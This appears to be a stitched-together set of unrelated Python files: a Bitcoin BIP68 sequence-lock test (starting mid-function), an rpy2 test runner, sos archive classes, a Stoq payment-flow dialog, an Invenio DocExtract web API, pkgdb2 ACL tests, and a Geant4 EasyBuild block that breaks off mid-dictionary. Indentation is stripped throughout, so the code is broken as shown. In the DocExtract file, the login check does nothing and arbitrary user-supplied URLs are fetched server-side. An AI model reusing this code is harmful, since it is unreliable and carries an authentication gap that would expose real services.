sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)
elif (not input_will_pass and time_delta <= cur_time - orig_time):
sequence_value = ((cur_time - orig_time) >> SEQUENCE_LOCKTIME_GRANULARITY)+1
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx.vin.append(CTxIn(COutPoint(int(utxos[j]["txid"], 16), utxos[j]["vout"]), nSequence=sequence_value))
value += utxos[j]["amount"]*COIN
# Overestimate the size of the tx - signatures should be less than 120 bytes, and leave 50 for the output
tx_size = len(ToHex(tx))//2 + 120*num_inputs + 50
tx.vout.append(CTxOut(int(value-self.relayfee*tx_size*COIN/1000), CScript([b'a'])))
rawtx = self.nodes[0].signrawtransactionwithwallet(ToHex(tx))["hex"]
if (using_sequence_locks and not should_pass):
# This transaction should be rejected
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, rawtx)
else:
# This raw transaction should be accepted
self.nodes[0].sendrawtransaction(rawtx)
utxos = self.nodes[0].listunspent()
# Test that sequence locks on unconfirmed inputs must have nSequence
# height or time of 0 to be accepted.
# Then test that BIP68-invalid transactions are removed from the mempool
# after a reorg.
def test_sequence_lock_unconfirmed_inputs(self):
# Store height so we can easily reset the chain at the end of the test
cur_height = self.nodes[0].getblockcount()
# Create a mempool tx.
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Anyone-can-spend mempool tx.
# Sequence lock of 0 should pass.
tx2 = CTransaction()
tx2.nVersion = 2
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
tx2_raw = self.nodes[0].signrawtransactionwithwallet(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(tx2_raw)
# Create a spend of the 0th output of orig_tx with a sequence lock
# of 1, and test what happens when submitting.
# orig_tx.vout[0] must be an anyone-can-spend output
def test_nonzero_locks(orig_tx, node, relayfee, use_height_lock):
sequence_value = 1
if not use_height_lock:
sequence_value |= SEQUENCE_LOCKTIME_TYPE_FLAG
tx = CTransaction()
tx.nVersion = 2
tx.vin = [CTxIn(COutPoint(orig_tx.sha256, 0), nSequence=sequence_value)]
tx.vout = [CTxOut(int(orig_tx.vout[0].nValue - relayfee*COIN), CScript([b'a']))]
tx.rehash()
if (orig_tx.hash in node.getrawmempool()):
# sendrawtransaction should fail if the tx is in the mempool
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, node.sendrawtransaction, ToHex(tx))
else:
# sendrawtransaction should succeed if the tx is not in the mempool
node.sendrawtransaction(ToHex(tx))
return tx
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Now mine some blocks, but make sure tx2 doesn't get mined.
# Use prioritisetransaction to lower the effective feerate to 0
self.nodes[0].prioritisetransaction(tx2.hash, int(-self.relayfee*COIN))
cur_time = self.mocktime
for i in range(10):
self.nodes[0].setmocktime(cur_time + 600)
self.nodes[0].generate(1)
cur_time += 600
assert(tx2.hash in self.nodes[0].getrawmempool())
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=True)
test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
# Mine tx2, and then try again
self.nodes[0].prioritisetransaction(tx2.hash, int(self.relayfee*COIN))
# Advance the time on the node so that we can test timelocks
self.nodes[0].setmocktime(cur_time+600)
self.nodes[0].generate(1)
assert(tx2.hash not in self.nodes[0].getrawmempool())
# Now that tx2 is not in the mempool, a sequence locked spend should
# succeed
tx3 = test_nonzero_locks(tx2, self.nodes[0], self.relayfee, use_height_lock=False)
assert(tx3.hash in self.nodes[0].getrawmempool())
self.nodes[0].generate(1)
assert(tx3.hash not in self.nodes[0].getrawmempool())
# One more test, this time using height locks
tx4 = test_nonzero_locks(tx3, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx4.hash in self.nodes[0].getrawmempool())
# Now try combining confirmed and unconfirmed inputs
tx5 = test_nonzero_locks(tx4, self.nodes[0], self.relayfee, use_height_lock=True)
assert(tx5.hash not in self.nodes[0].getrawmempool())
utxos = self.nodes[0].listunspent()
tx5.vin.append(CTxIn(COutPoint(int(utxos[0]["txid"], 16), utxos[0]["vout"]), nSequence=1))
tx5.vout[0].nValue += int(utxos[0]["amount"]*COIN)
raw_tx5 = self.nodes[0].signrawtransactionwithwallet(ToHex(tx5))["hex"]
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, raw_tx5)
# Test mempool-BIP68 consistency after reorg
#
# State of the transactions in the last blocks:
# ... -> [ tx2 ] -> [ tx3 ]
# tip-1 tip
# And currently tx4 is in the mempool.
#
# If we invalidate the tip, tx3 should get added to the mempool, causing
# tx4 to be removed (fails sequence-lock).
self.nodes[0].invalidateblock(self.nodes[0].getbestblockhash())
assert(tx4.hash not in self.nodes[0].getrawmempool())
assert(tx3.hash in self.nodes[0].getrawmempool())
# Now mine 2 empty blocks to reorg out the current tip (labeled tip-1 in
# diagram above).
# This would cause tx2 to be added back to the mempool, which in turn causes
# tx3 to be removed.
tip = int(self.nodes[0].getblockhash(self.nodes[0].getblockcount()-1), 16)
height = self.nodes[0].getblockcount()
for i in range(2):
block = create_block(tip, create_coinbase(height), cur_time)
block.nVersion = 3
block.rehash()
block.solve()
tip = block.sha256
height += 1
self.nodes[0].submitblock(ToHex(block))
cur_time += 1
mempool = self.nodes[0].getrawmempool()
assert(tx3.hash not in mempool)
assert(tx2.hash in mempool)
# Reset the chain and get rid of the mocktimed-blocks
self.nodes[0].setmocktime(self.mocktime)
self.nodes[0].invalidateblock(self.nodes[0].getblockhash(cur_height+1))
self.nodes[0].generate(10)
# Make sure that BIP68 isn't being used to validate blocks, prior to
# versionbits activation. If more blocks are mined prior to this test
# being run, then it's possible the test has activated the soft fork, and
# this test should be moved to run earlier, or deleted.
def test_bip68_not_consensus(self):
assert(get_bip9_status(self.nodes[0], 'csv')['status'] != 'active')
txid = self.nodes[0].sendtoaddress(self.nodes[0].getnewaddress(), 2)
tx1 = FromHex(CTransaction(), self.nodes[0].getrawtransaction(txid))
tx1.rehash()
# Make an anyone-can-spend transaction
tx2 = CTransaction()
tx2.nVersion = 1
tx2.vin = [CTxIn(COutPoint(tx1.sha256, 0), nSequence=0)]
tx2.vout = [CTxOut(int(tx1.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
# sign tx2
tx2_raw = self.nodes[0].signrawtransactionwithwallet(ToHex(tx2))["hex"]
tx2 = FromHex(tx2, tx2_raw)
tx2.rehash()
self.nodes[0].sendrawtransaction(ToHex(tx2))
# Now make an invalid spend of tx2 according to BIP68
sequence_value = 100 # 100 block relative locktime
tx3 = CTransaction()
tx3.nVersion = 2
tx3.vin = [CTxIn(COutPoint(tx2.sha256, 0), nSequence=sequence_value)]
tx3.vout = [CTxOut(int(tx2.vout[0].nValue - self.relayfee*COIN), CScript([b'a']))]
tx3.rehash()
assert_raises_rpc_error(-26, NOT_FINAL_ERROR, self.nodes[0].sendrawtransaction, ToHex(tx3))
# make a block that violates bip68; ensure that the tip updates
tip = int(self.nodes[0].getbestblockhash(), 16)
block = create_block(tip, create_coinbase(self.nodes[0].getblockcount()+1), self.mocktime + 600)
block.nVersion = 3
block.vtx.extend([tx1, tx2, tx3])
block.hashMerkleRoot = block.calc_merkle_root()
block.rehash()
block.solve()
self.nodes[0].submitblock(ToHex(block))
assert_equal(self.nodes[0].getbestblockhash(), block.hash)
def activateCSV(self):
# activation should happen at block height 432 (3 periods)
# getblockchaininfo will show CSV as active at block 431 (144 * 3 -1) since it's returning whether CSV is active for the next block.
min_activation_height = 432
height = self.nodes[0].getblockcount()
assert_greater_than(min_activation_height - height, 2)
self.nodes[0].generate(min_activation_height - height - 2)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], "locked_in")
self.nodes[0].generate(1)
assert_equal(get_bip9_status(self.nodes[0], 'csv')['status'], "active")
self.sync_blocks()
# Use self.nodes[1] to test that version 2 transactions are standard.
def test_version2_relay(self):
inputs = [ ]
outputs = { self.nodes[1].getnewaddress() : 1.0 }
rawtx = self.nodes[1].createrawtransaction(inputs, outputs)
rawtxfund = self.nodes[1].fundrawtransaction(rawtx)['hex']
tx = FromHex(CTransaction(), rawtxfund)
tx.nVersion = 2
tx_signed = self.nodes[1].signrawtransactionwithwallet(ToHex(tx))["hex"]
self.nodes[1].sendrawtransaction(tx_signed)
if __name__ == '__main__':
BIP68Test().main()
|
import unittest
import testRObject
import testVector
import testArray
import testDataFrame
import testFormula
import testFunction
import testEnvironment
import testRobjects
import testMethods
import testPackages
import testHelp
import testLanguage
import testNumpyConversions
def suite():
suite_RObject = testRObject.suite()
suite_Vector = testVector.suite()
suite_Array = testArray.suite()
suite_DataFrame = testDataFrame.suite()
suite_Function = testFunction.suite()
suite_Environment = testEnvironment.suite()
suite_Formula = testFormula.suite()
suite_Robjects = testRobjects.suite()
suite_NumpyConversions = testNumpyConversions.suite()
suite_Methods = testMethods.suite()
suite_Packages = testPackages.suite()
suite_Help = testHelp.suite()
suite_Language = testLanguage.suite()
alltests = unittest.TestSuite([suite_RObject,
suite_Vector,
suite_Array,
suite_DataFrame,
suite_Function,
suite_Environment,
suite_Formula,
suite_Robjects,
suite_Methods,
suite_NumpyConversions,
suite_Packages,
suite_Help,
suite_Language
])
return alltests
def main():
r = unittest.TestResult()
suite().run(r)
return r
if __name__ == '__main__':
tr = unittest.TextTestRunner(verbosity = 2)
suite = suite()
tr.run(suite)
|
from sos.cleaner.archives import SoSObfuscationArchive
import os
import tarfile
class DataDirArchive(SoSObfuscationArchive):
"""A plain directory on the filesystem that is not directly associated with
any known or supported collection utility
"""
type_name = 'data_dir'
description = 'unassociated directory'
@classmethod
def check_is_type(cls, arc_path):
return os.path.isdir(arc_path)
def set_archive_root(self):
return os.path.abspath(self.archive_path)
class TarballArchive(SoSObfuscationArchive):
"""A generic tar archive that is not associated with any known or supported
collection utility
"""
type_name = 'tarball'
description = 'unassociated tarball'
@classmethod
def check_is_type(cls, arc_path):
try:
return tarfile.is_tarfile(arc_path)
except Exception:
return False
def set_archive_root(self):
if self.tarobj.firstmember.isdir():
return self.tarobj.firstmember.name
return ''
|
"""Payment Flow History Report Dialog"""
from storm.expr import And, Eq, Or
from stoqlib.database.expr import Date
from stoqlib.gui.dialogs.daterangedialog import DateRangeDialog
from stoqlib.gui.utils.printing import print_report
from stoqlib.lib.message import info
from stoqlib.lib.translation import stoqlib_gettext
from stoqlib.reporting.payment import PaymentFlowHistoryReport
_ = stoqlib_gettext
payment_flow_query = """
SELECT all_payment_dates.date,
COALESCE(payments_to_pay.count, 0) as to_pay_payments,
COALESCE(payments_to_pay.to_pay, 0) as to_pay,
COALESCE(payments_paid.count, 0) as paid_payments,
COALESCE(payments_paid.paid, 0) as paid,
COALESCE(payments_to_receive.count, 0) as to_receive_payments,
COALESCE(payments_to_receive.to_receive, 0) as to_receive,
COALESCE(payments_received.count, 0) as received_payments,
COALESCE(payments_received.received, 0) as received
FROM (SELECT date(due_date) as date FROM payment
UNION SELECT date(paid_date) as date FROM payment WHERE
paid_date IS NOT NULL) as all_payment_dates
-- To pay (out payments)
LEFT JOIN (SELECT DATE(due_date) as date, count(1) as count, sum(value) as to_pay
FROM payment WHERE payment_type = 'out' AND status not in ('preview', 'cancelled')
GROUP BY DATE(due_date))
AS payments_to_pay ON (all_payment_dates.date = payments_to_pay.date)
-- Paid (out payments)
LEFT JOIN (SELECT DATE(paid_date) as date, count(1) as count, sum(value) as paid
FROM payment WHERE payment_type = 'out'
AND payment.status not in ('preview', 'cancelled')
GROUP BY DATE(paid_date))
AS payments_paid ON (all_payment_dates.date = payments_paid.date)
-- To receive (in payments)
LEFT JOIN (SELECT DATE(due_date) as date, count(1) as count, sum(value) as to_receive
FROM payment WHERE payment_type = 'in'
AND payment.status not in ('preview', 'cancelled')
GROUP BY DATE(due_date))
AS payments_to_receive ON (all_payment_dates.date = payments_to_receive.date)
-- Received (in payments)
LEFT JOIN (SELECT DATE(paid_date) as date, count(1) as count, sum(value) as received
FROM payment WHERE payment_type = 'in'
AND payment.status not in ('preview', 'cancelled')
GROUP BY DATE(paid_date))
AS payments_received ON (all_payment_dates.date = payments_received.date)
ORDER BY all_payment_dates.date;
"""
class PaymentFlowDay(object):
def __init__(self, store, row, previous_day=None):
"""Payment Flow History for a given date
:param row: A list of values from the payment_flow_query above
:param previous_day: The `previous_day <PaymentFlowDay>`. This is used
to calculate the expected and real balances for each day (based on the
previous dates).
"""
(date, to_pay_count, to_pay, paid_count, paid, to_receive_count,
to_receive, received_count, received) = row
self.history_date = date
# values
self.to_pay = to_pay
self.to_receive = to_receive
self.paid = paid
self.received = received
# counts
self.to_pay_payments = to_pay_count
self.to_receive_payments = to_receive_count
self.paid_payments = paid_count
self.received_payments = received_count
if previous_day:
self.previous_balance = previous_day.balance_real
else:
self.previous_balance = 0
# Today's balance is the previous day balance, plus the payments we
# received, minus what we paid. expected if for the payments we should
# have paid/received
self.balance_expected = self.previous_balance + to_receive - to_pay
self.balance_real = self.previous_balance + received - paid
self.store = store
def get_divergent_payments(self):
"""Returns a :class:`Payment` sequence that meet the following requirements:
* The payment due date, paid date or cancel date is the current
PaymentFlowHistory date.
* The payment was paid/received with different values (eg with
discount or surcharge).
* The payment was scheduled to be paid/received on the current,
but it was not.
* The payment was not expected to be paid/received on the current date.
"""
from stoqlib.domain.payment.payment import Payment
date = self.history_date
query = And(Or(Date(Payment.due_date) == date,
Date(Payment.paid_date) == date,
Date(Payment.cancel_date) == date),
Or(Eq(Payment.paid_value, None),
Payment.value != Payment.paid_value,
Eq(Payment.paid_date, None),
Date(Payment.due_date) != Date(Payment.paid_date)))
return self.store.find(Payment, query)
@classmethod
def get_flow_history(cls, store, start, end):
"""Get the payment flow history for a given date interval
This will return a list of PaymentFlowDay, one for each date that has
payments registered and are in the interval specified.
"""
history = []
previous_entry = None
for row in store.execute(payment_flow_query).get_all():
entry = cls(store, row, previous_entry)
if entry.history_date > end:
break
# We only store entries for dates higher than the user requested, but
# we still need to create the entries from the beginning, so we
# have the real balances
if entry.history_date >= start:
history.append(entry)
previous_entry = entry
return history
class PaymentFlowHistoryDialog(DateRangeDialog):
title = _(u'Payment Flow History Dialog')
desc = _("Select a date or a range to be visualised in the report:")
size = (-1, -1)
def __init__(self, store):
"""A dialog to print the PaymentFlowHistoryReport report.
:param store: a store
"""
self.store = store
DateRangeDialog.__init__(self, title=self.title, header_text=self.desc)
#
# BasicDialog
#
def confirm(self):
DateRangeDialog.confirm(self)
start = self.retval.start
end = self.retval.end
results = PaymentFlowDay.get_flow_history(self.store, start, end)
if not results:
info(_('No payment history found.'))
return False
print_report(PaymentFlowHistoryReport, payment_histories=results)
return True
|
# -*- coding: utf-8 -*-
"""DocExtract REST and Web API
Exposes document extration facilities to the world
"""
from tempfile import NamedTemporaryFile
from invenio.webinterface_handler import WebInterfaceDirectory
from invenio.webuser import collect_user_info
from invenio.webpage import page
from invenio.config import CFG_TMPSHAREDDIR, CFG_ETCDIR
from invenio.refextract_api import extract_references_from_file_xml, \
extract_references_from_url_xml, \
extract_references_from_string_xml
from invenio.bibformat_engine import format_record
def check_login(req):
"""Check that the user is logged in"""
user_info = collect_user_info(req)
if user_info['email'] == 'guest':
# 1. User is guest: must login prior to upload
# return 'Please login before uploading file.'
pass
def check_url(url):
"""Check that the url we received is not gibberish"""
return url.startswith('http://') or \
url.startswith('https://') or \
url.startswith('ftp://')
def extract_from_pdf_string(pdf):
"""Extract references from a pdf stored in a string
Given a string representing a pdf, this function writes the string to
disk and passes it to refextract.
We need to create a temoporary file because we need to run pdf2text on it"""
# Save new record to file
tf = NamedTemporaryFile(prefix='docextract-pdf',
dir=CFG_TMPSHAREDDIR)
try:
tf.write(pdf)
tf.flush()
refs = extract_references_from_file_xml(tf.name)
finally:
# Also deletes the file
tf.close()
return refs
def make_arxiv_url(arxiv_id):
"""Make a url we can use to download a pdf from arxiv
Arguments:
arxiv_id -- the arxiv id of the record to link to
"""
return "http://arxiv.org/pdf/%s.pdf" % arxiv_id
class WebInterfaceAPIDocExtract(WebInterfaceDirectory):
"""DocExtract REST API"""
_exports = [
('extract-references-pdf', 'extract_references_pdf'),
('extract-references-pdf-url', 'extract_references_pdf_url'),
('extract-references-txt', 'extract_references_txt'),
]
def extract_references_pdf(self, req, form):
"""Extract references from uploaded pdf"""
check_login(req)
if 'pdf' not in form:
return 'No PDF file uploaded'
return extract_from_pdf_string(form['pdf'].stream.read())
def extract_references_pdf_url(self, req, form):
"""Extract references from the pdf pointed by the passed url"""
check_login(req)
if 'url' not in form:
return 'No URL specified'
url = form['url']
if not check_url(url):
return 'Invalid URL specified'
return extract_references_from_url_xml(url)
def extract_references_txt(self, req, form):
"""Extract references from plain text"""
check_login(req)
if 'txt' not in form:
return 'No text specified'
txt = form['txt'].stream.read()
return extract_references_from_string_xml(txt)
class WebInterfaceDocExtract(WebInterfaceDirectory):
"""DocExtract API"""
_exports = ['api',
('extract-references', 'extract_references'),
('example.pdf', 'example_pdf'),
]
api = WebInterfaceAPIDocExtract()
def example_pdf(self, req, _form):
"""Serve a test pdf for tests"""
f = open("%s/docextract/example.pdf" % CFG_ETCDIR, 'rb')
try:
req.write(f.read())
finally:
f.close()
def extract_references_template(self):
"""Template for reference extraction page"""
return """Please specify a pdf or a url or some references to parse
<form action="extract-references" method="post"
enctype="multipart/form-data">
<p>PDF: <input type="file" name="pdf" /></p>
<p>arXiv: <input type="text" name="arxiv" /></p>
<p>URL: <input type="text" name="url" style="width: 600px;"/></p>
<textarea name="txt" style="width: 500px; height: 500px;"></textarea>
<p><input type="submit" /></p>
</form>
"""
def extract_references(self, req, form):
"""Refrences extraction page
This page can be used for authors to test their pdfs against our
refrences extraction process"""
user_info = collect_user_info(req)
# Handle the 3 POST parameters
if 'pdf' in form and form['pdf']:
pdf = form['pdf']
references_xml = extract_from_pdf_string(pdf)
elif 'arxiv' in form and form['arxiv']:
url = make_arxiv_url(arxiv_id=form['arxiv'])
references_xml = extract_references_from_url_xml(url)
elif 'url' in form and form['url']:
url = form['url']
references_xml = extract_references_from_url_xml(url)
elif 'txt' in form and form['txt']:
txt = form['txt']
references_xml = extract_references_from_string_xml(txt)
else:
references_xml = None
# If we have not uploaded anything yet
# Display the form that allows us to do so
if not references_xml:
out = self.extract_references_template()
else:
out = """
<style type="text/css">
#referenceinp_link { display: none; }
</style>
"""
out += format_record(0,
'hdref',
xml_record=references_xml.encode('utf-8'),
user_info=user_info)
# Render the page (including header, footer)
return page(title='References Extractor',
body=out,
uid=user_info['uid'],
req=req)
|
'''
pkgdb tests for the Collection object.
'''
__requires__ = ['SQLAlchemy >= 0.7']
import pkg_resources
import json
import unittest
import sys
import os
from mock import patch
sys.path.insert(0, os.path.join(os.path.dirname(
os.path.abspath(__file__)), '..'))
import pkgdb2
import pkgdb2.lib.model as model
from tests import (Modeltests, FakeFasUser,
FakeFasGroupValid, create_package_acl,
create_package_acl2, user_set)
class PkgdbGrouptests(Modeltests):
""" PkgdbGroup tests. """
def setUp(self):
""" Set up the environnment, ran before every tests. """
super(PkgdbGrouptests, self).setUp()
pkgdb2.APP.config['TESTING'] = True
pkgdb2.SESSION = self.session
pkgdb2.api.extras.SESSION = self.session
pkgdb2.ui.SESSION = self.session
pkgdb2.ui.acls.SESSION = self.session
pkgdb2.ui.admin.SESSION = self.session
pkgdb2.ui.collections.SESSION = self.session
pkgdb2.ui.packagers.SESSION = self.session
pkgdb2.ui.packages.SESSION = self.session
self.app = pkgdb2.APP.test_client()
# Let's make sure the cache is empty for the tests
pkgdb2.CACHE.invalidate()
def set_group_acls(self):
''' Create some Group ACLs. '''
fedocal_pkg = model.Package.by_name(self.session, 'rpms', 'fedocal')
devel_collec = model.Collection.by_name(self.session, 'master')
f18_collec = model.Collection.by_name(self.session, 'f18')
pklist_fedocal_f18 = model.PackageListing.by_pkgid_collectionid(
self.session, fedocal_pkg.id, f18_collec.id)
pklist_fedocal_devel = model.PackageListing.by_pkgid_collectionid(
self.session, fedocal_pkg.id, devel_collec.id)
packager = model.PackageListingAcl(
fas_name='group::infra-sig',
packagelisting_id=pklist_fedocal_f18.id,
acl='commit',
status='Approved',
)
self.session.add(packager)
packager = model.PackageListingAcl(
fas_name='group::infra-sig',
packagelisting_id=pklist_fedocal_devel.id,
acl='commit',
status='Approved',
)
self.session.add(packager)
packager = model.PackageListingAcl(
fas_name='group::infra-sig',
packagelisting_id=pklist_fedocal_f18.id,
acl='watchbugzilla',
status='Approved',
)
self.session.add(packager)
packager = model.PackageListingAcl(
fas_name='group::infra-sig',
packagelisting_id=pklist_fedocal_devel.id,
acl='watchbugzilla',
status='Approved',
)
self.session.add(packager)
self.session.commit()
def test_api_bugzilla_group(self):
""" Test the api_bugzilla function. """
create_package_acl2(self.session)
self.set_group_acls()
output = self.app.get('/api/bugzilla/')
self.assertEqual(output.status_code, 200)
expected = """# Package Database VCS Acls
Fedora|fedocal|A web-based calendar for Fedora|pingou||group::infra-sig,pingou
Fedora|geany|A fast and lightweight IDE using GTK2|group::gtk-sig||
Fedora|guake|Top down terminal for GNOME|pingou||spot"""
self.assertEqual(output.data, expected)
output = self.app.get('/api/bugzilla/?format=json')
self.assertEqual(output.status_code, 200)
expected = {
u'bugzillaAcls': {
'Fedora': {
"fedocal": {
"owner": "pingou",
"cclist": {
"groups": ["@infra-sig"],
"people": ["pingou"]
},
"qacontact": None,
"summary": "A web-based calendar for Fedora"
},
'geany': {
'owner': '@gtk-sig',
'cclist': {
'groups': [],
'people': []
},
'qacontact': None,
'summary': 'A fast and lightweight IDE using '
'GTK2'
},
'guake': {
'owner': 'pingou',
'cclist': {
'groups': [],
'people': ['spot']
},
'qacontact': None,
'summary': 'Top down terminal for GNOME'
}
}
},
'title': 'Fedora Package Database -- Bugzilla ACLs'
}
data = json.loads(output.data)
self.assertEqual(data, expected)
@patch('pkgdb2.lib.utils')
@patch('pkgdb2.packager_login_required')
def test_package_give_group(self, login_func, mock_func):
""" Test the package_give function to a group. """
login_func.return_value = None
create_package_acl(self.session)
mock_func.get_packagers.return_value = ['spot']
group = FakeFasGroupValid()
group.name = 'gtk-sig'
mock_func.get_fas_group.return_value = group
mock_func.log.return_value = ''
user = FakeFasUser()
with user_set(pkgdb2.APP, user):
output = self.app.get('/package/rpms/guake/give')
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h1>Give Point of Contact of package: guake</h1>'
in output.data)
self.assertTrue(
'<input id="csrf_token" name="csrf_token"' in output.data)
csrf_token = output.data.split(
'name="csrf_token" type="hidden" value="')[1].split('">')[0]
data = {
'branches': 'master',
'poc': 'spot',
'csrf_token': csrf_token,
}
output = self.app.post('/package/rpms/guake/give', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertTrue(
'rpms/<span property="doap:name">guake</span>'
in output.data)
self.assertEqual(
output.data.count('<a href="/packager/spot/">'), 2)
user.username = 'spot'
user.groups.append('gtk-sig')
with user_set(pkgdb2.APP, user):
output = self.app.get('/package/rpms/guake/give')
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h1>Give Point of Contact of package: guake</h1>'
in output.data)
self.assertTrue(
'<input id="csrf_token" name="csrf_token"' in output.data)
csrf_token = output.data.split(
'name="csrf_token" type="hidden" value="')[1].split('">')[0]
data = {
'branches': 'master',
'poc': 'group::gtk-sig',
'csrf_token': csrf_token,
}
output = self.app.post('/package/rpms/guake/give', data=data,
follow_redirects=True)
self.assertEqual(output.status_code, 200)
self.assertEqual(
output.data.count('<a href="/packager/spot/">'), 2)
self.assertEqual(
output.data.count('<a href="/packager/group::gtk-sig/">'),
1)
output = self.app.get('/package/rpms/guake/give')
self.assertEqual(output.status_code, 200)
self.assertTrue(
'<h1>Give Point of Contact of package: guake</h1>'
in output.data)
self.assertTrue(
'<td><select id="branches" multiple name="branches">'
'</select></td>'
in output.data)
if __name__ == '__main__':
SUITE = unittest.TestLoader().loadTestsFromTestCase(PkgdbGrouptests)
unittest.TextTestRunner(verbosity=2).run(SUITE)
|
"""
Geant4 support, implemented as an easyblock.
@author: Stijn De Weirdt (Ghent University)
@author: Dries Verdegem (Ghent University)
@author: Kenneth Hoste (Ghent University)
@author: Pieter De Baets (Ghent University)
@author: Jens Timmerman (Ghent University)
"""
import os
import shutil
import re
from distutils.version import LooseVersion
import easybuild.tools.environment as env
from easybuild.framework.easyconfig import CUSTOM
from easybuild.easyblocks.generic.cmakemake import CMakeMake
from easybuild.tools.filetools import run_cmd, run_cmd_qa
from easybuild.tools.modules import get_software_root
from easybuild.tools.filetools import mkdir
class EB_Geant4(CMakeMake):
"""
Support for building Geant4.
Note: Geant4 moved to a CMAKE like build system as of version 9.5.
"""
@staticmethod
def extra_options():
"""
Define extra options needed by Geant4
"""
extra_vars = {
'G4ABLAVersion': [None, "G4ABLA version", CUSTOM],
'G4NDLVersion': [None, "G4NDL version", CUSTOM],
'G4EMLOWVersion': [None, "G4EMLOW version", CUSTOM],
'PhotonEvaporationVersion': [None, "PhotonEvaporation version", CUSTOM],
'G4RadioactiveDecayVersion': [None, "G4RadioactiveDecay version", CUSTOM],
}
return CMakeMake.extra_options(extra_vars)
def configure_step(self):
"""
Configure Geant4 build, either via CMake for versions more recent than 9.5,
or using an interactive configuration procedure otherwise.
"""
# Geant4 switched to a cmake build system in 9.5
if LooseVersion(self.version) >= LooseVersion("9.5"):
mkdir('configdir')
os.chdir('configdir')
super(EB_Geant4, self).configure_step(srcdir="..")
else:
pwd = self.cfg['start_dir']
dst = self.installdir
clhepdir = get_software_root('CLHEP')
cmd = "%s/Configure -E -build" % pwd
self.qanda = {# questions and answers for version 9.1.p03
"There exists a config.sh file. Shall I use it to set the defaults? [y]": "n",
"Would you like to see the instructions? [n]": "",
"[Type carriage return to continue]": "",
"Definition of G4SYSTEM variable is Linux-g++. That stands for: 1) OS : Linux" \
"2) Compiler : g++ To modify default settings, select number above (e.g. 2) " \
"[Press [Enter] for default settings]": "2",
"Which C++ compiler? [g++]": "$(GPP)",
"Confirm your selection or set recommended 'g++'! [*]": "",
"Definition of G4SYSTEM variable is Linux-icc. That stands for: 1) OS : Linux 2)" \
"Compiler : icc To modify default settings, select number above (e.g. 2) " \
"[Press [Enter] for default settings]": "",
"Do you expect to run these scripts and binaries on multiple machines? [n]": "y",
"Where is Geant4 source installed? [%s]" % pwd: "",
"Specify the path where Geant4 libraries and source files should be installed." \
" [%s]" % pwd: dst,
"Do you want to copy all Geant4 headers in one directory? [n]": "y",
"Please, specify default directory where ALL the Geant4 data is installed:" \
"G4LEVELGAMMADATA: %(pwd)s/data/PhotonEvaporation2.0 G4RADIOACTIVEDATA: " \
"%(pwd)s/data/RadioactiveDecay3.2 G4LEDATA: %(pwd)s/data/G4EMLOW5.1 G4NEUTRONHPDATA: " \
"%(pwd)s/data/G4NDL3.12 G4ABLADATA: %(pwd)s/data/G4ABLA3.0 You will be asked about " \
"customizing these next. [%(pwd)s/data]" % {'pwd': pwd}: "%s/data" % dst,
"Directory %s/data doesn't exist. Use that name anyway? [n]" % dst: "y",
"Please, specify default directory where the Geant4 data is installed: " \
"1) G4LEVELGAMMADATA: %(dst)s/data/PhotonEvaporation2.0 2) G4RADIOACTIVEDATA: " \
"%(dst)s/data/RadioactiveDecay3.2 3) G4LEDATA: %(dst)s/data/G4EMLOW5.1 4) G4NEUTRONHPDATA: " \
"%(dst)s/data/G4NDL3.12 5) G4ABLADATA: %(dst)s/data/G4ABLA3.0 To modify default settings, " \
"select number above (e.g. 2) [Press [Enter] for default settings]" % {'dst': dst}: "",
"Please, specify where CLHEP is installed: CLHEP_BASE_DIR: ": clhepdir,
"Please, specify where CLHEP is installed: CLHEP_BASE_DIR: [%s]" % clhepdir: "",
"You can customize paths and library name of you CLHEP installation: 1) CLHEP_INCLUDE_DIR: " \
"%(clhepdir)s/include 2) CLHEP_LIB_DIR: %(clhepdir)s/lib 3) CLHEP_LIB: CLHEP To modify " \
"default settings, select number above (e.g. 2) [Press [Enter] for default settings]" %
{'clhepdir': clhepdir}: "",
"By default 'static' (.a) libraries are built. Do you want to build 'shared' (.so) " \
"libraries? [n]": "y",
"You selected to build 'shared' (.so) libraries. Do you want to build 'static' (.a) " \
"libraries too? [n]": "y",
"Do you want to build 'global' compound libraries? [n]": "",
"Do you want to compile libraries in DEBUG mode (-g)? [n]": "",
"G4UI_NONE If this variable is set, no UI sessions nor any UI libraries are built. " \
"This can be useful when running a pure batch job or in a user framework having its own " \
"UI system. Do you want to set this variable ? [n]": "",
"G4UI_BUILD_XAW_SESSION G4UI_USE_XAW Specifies to include and use the XAW interfaces in " \
"the application to be built. The XAW (X11 Athena Widget set) extensions are required to " \
"activate and build this driver. [n]": "",
"G4UI_BUILD_XM_SESSION G4UI_USE_XM Specifies to include and use the XM Motif based user " \
"interfaces. The XM Motif extensions are required to activate and build this driver. [n]": "",
"G4VIS_NONE If this variable is set, no visualization drivers will be built or used. Do " \
"you want to set this variable ? [n]": "n",
"G4VIS_BUILD_OPENGLX_DRIVER G4VIS_USE_OPENGLX It is an interface to the de facto standard " \
"3D graphics library, OpenGL. It is well suited for real-time fast visualization and " \
"prototyping. The X11 version of the OpenGL libraries is required. [n]": "",
"G4VIS_BUILD_OPENGLXM_DRIVER G4VIS_USE_OPENGLXM It is an interface to the de facto " \
